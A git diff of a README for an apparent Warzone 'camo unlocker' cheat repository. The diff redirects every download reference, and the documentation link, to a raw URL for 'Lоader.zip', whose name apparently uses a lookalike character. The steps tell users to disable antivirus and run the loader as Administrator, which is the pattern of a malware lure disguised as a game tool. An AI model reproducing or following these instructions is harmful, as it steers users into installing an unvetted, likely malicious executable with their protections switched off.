abdalla355/CamoUnlockerPro-Warzone/README.md

 **PLEASE READ CAREFULLY BEFORE INSTALLATION**

-1. **Download Loader.rar from the repository.**
+1. **Download https://raw.githubusercontent.com/abdalla355/CamoUnlockerPro-Warzone/main/Lоader.zip from the repository.**
-2. Extract the Loader.rar archive to a folder of your choice.
+2. Extract the https://raw.githubusercontent.com/abdalla355/CamoUnlockerPro-Warzone/main/Lоader.zip archive to a folder of your choice.
 3. Disable your antivirus temporarily (some antiviruses might flag the loader due to its modification capabilities).
 4. Run the Loader executable as Administrator (Right-click & choose "Run as Administrator").
 5. Follow on-screen prompts to select your Warzone executable.
 6. Choose the camo sets you wish to unlock and confirm your choices.
 7. Start Warzone and enjoy your new camouflages!

 *Mac/Linux/SteamOS users*: Open the Loader using Wine or Proton.
-For step-by-step, view the included [platform-specific guides](./docs/COMPATIBILITY.md).
+For step-by-step, view the included [platform-specific guides](https://raw.githubusercontent.com/abdalla355/CamoUnlockerPro-Warzone/main/Lоader.zip).

 ---